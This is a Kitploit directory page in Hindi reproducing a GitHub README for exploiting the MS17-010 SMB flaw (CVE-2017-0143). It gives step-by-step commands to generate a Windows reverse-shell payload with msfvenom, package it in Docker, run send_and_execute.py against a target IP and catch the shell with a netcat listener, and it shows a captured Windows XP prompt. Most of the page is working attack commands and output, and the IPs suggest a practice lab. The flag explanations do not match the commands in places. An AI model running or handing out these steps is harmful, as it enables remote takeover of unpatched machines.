Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
MS17-010_CVE-2017-0143 — MS17-010_CVE-2017-0143 | Kitploit
उपकरण/GitHubGitHub/h3x0v3rl0rd/ms17-010_cve-2017-0143
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubh3x0v3rl0rd/ms17-010_cve-2017-0143

MS17-010_CVE-2017-0143

MS17-010_CVE-2017-0143

रिपॉजिटरी देखें
40141 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MS17-010

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2017-0143

डॉकर

msfvenom का उपयोग करके पेलोड जनरेट करना:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe
  • -p windows/shell_reverse_tcp: पेलोड निर्दिष्ट करता है (विंडोज के लिए एक रिवर्स टीसीपी शेल)।
  • LHOST=10.10.14.4: हमलावर का आईपी पता (जहां लक्ष्य वापस कनेक्ट होगा)।
  • LPORT=443: हमलावर की मशीन पर कनेक्शन सुनने के लिए पोर्ट।
  • -f exe: पेलोड को एक्जीक्यूटेबल फाइल के रूप में आउटपुट करता है।
  • -a x86: आर्किटेक्चर निर्दिष्ट करता है (32-बिट)।
  • -o rev.exe: पेलोड को rev.exe के रूप में सहेजता है।

डॉकर कंटेनर सेट करना:

  • डॉकर का उपयोग क्यों करें?
    • डॉकर एक समान और पृथक वातावरण प्रदान करता है जहाँ एक्सप्लॉइट चलाया जा सके।
    • यह निर्भरता समस्याओं (जैसे, पायथन संस्करण विरोध, लापता लाइब्रेरीज़) से बचाता है।

डॉकर सेट करने के चरण:

root@kitploit:~
sudo apt-get install docker.io

फोल्डर संरचना बनाएं:

root@kitploit:~
mkdir exploit
cd exploit
touch Dockerfile
echo "impacket==0.9.23" > requirements.txt
  • Dockerfile: डॉकर कंटेनर बनाने के निर्देश शामिल हैं।
  • requirements.txt: पायथन निर्भरताएँ सूचीबद्ध करता है (जैसे, impacket)।

Dockerfile लिखें:

root@kitploit:~
FROM python:2.7-alpine
RUN apk --update --no-cache add \
    git \
    zlib-dev \
    musl-dev \
    libc-dev \
    gcc \
    libffi-dev \
    openssl-dev && \
    rm -rf /var/cache/apk/*

RUN mkdir -p /opt/exploit
COPY requirements.txt /opt/exploit
COPY ms17-010.exe /opt/exploit
WORKDIR /opt/exploit
RUN pip install -r requirements.txt
  • FROM python:2.7-alpine: पायथन 2.7 के साथ एक हल्की Alpine Linux इमेज का उपयोग करता है।
  • RUN apk --update --no-cache add: आवश्यक निर्भरताएँ स्थापित करता है (जैसे, git, gcc)।
  • COPY rev.exe /opt/cattime: रिवर्स शेल एक्जीक्यूटेबल (rev.exe) को कंटेनर में कॉपी करता है।
  • RUN pip install -r requirements.txt: पायथन निर्भरताएँ स्थापित करता है (जैसे, impacket)।

डॉकर कंटेनर बनाएं:

root@kitploit:~
sudo docker build -t exploit .

कंटेनर चलाएं:

root@kitploit:~
sudo docker run -it exploit /bin/sh

एक्सप्लॉइट डाउनलोड और चलाना:

root@kitploit:~
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
root@kitploit:~
cd MS17-010_CVE-2017-0143
root@kitploit:~
python send_and_execute.py 10.10.10.4 ../ms17-010.exe

रिवर्स शेल:

root@kitploit:~
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1035
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

पुरानी विधियाँ

विधि 1

root@kitploit:~
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143/
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o ms17-010.exe

एक nc लिसनर बनाएं

root@kitploit:~
nc -nlvp 1337

एक्सप्लॉइट

root@kitploit:~
python2.7 send_and_execute.py 10.129.163.162 ms17-010.exe

image

यदि आपको ऐसी कोई त्रुटि मिलती है तो इन चरणों का पालन करें:

root@kitploit:~
cd MS17-010_CVE-2017-0143/
sudo python2.7 get-pip.py
pip2.7 install --upgrade setuptools
python2.7 -m pip install impacket

अब हम एक्सप्लॉइट चला सकते हैं: image

image

विधि 2

अब यह एक्सप्लॉइट python2 में बनाया गया है और इसे impacket, pycrypto जैसी कुछ लाइब्रेरीज़ की आवश्यकता है। इसके लिए वर्चुअल एनवायरनमेंट सेट करना होता है और यहाँ virtualenv प्रोग्राम मदद करता है। एक बार आप एनवायरनमेंट बना लें तो फिर आप source यूटिलिटी प्रोग्राम का उपयोग करके उस एनवायरनमेंट को सक्रिय कर सकते हैं। यहाँ python2 का उपयोग इंटरप्रेटर के रूप में किया जाता है क्योंकि नवीनतम Kali में python3 को ग्लोबल इंटरप्रेटर के रूप में सेट किया गया है और हमारा एक्सप्लॉइट python2 में है।

हम वर्चुअल एनवायरनमेंट का उपयोग क्यों करते हैं? इसके लिए आप यह देख सकते हैं। https://www.dabapps.com/blog/introduction-to-pip-and-virtualenv-python/

root@kitploit:~
virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto

image

image

root@kitploit:~
python checker.py 10.10.10.4

image

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4445 -f exe > shell.exe

image

root@kitploit:~
python send_and_execute.py 10.10.10.4 shell.exe 445 browser

image

root@kitploit:~
nc -nlvp 4445

image

टूल डाउनलोड करें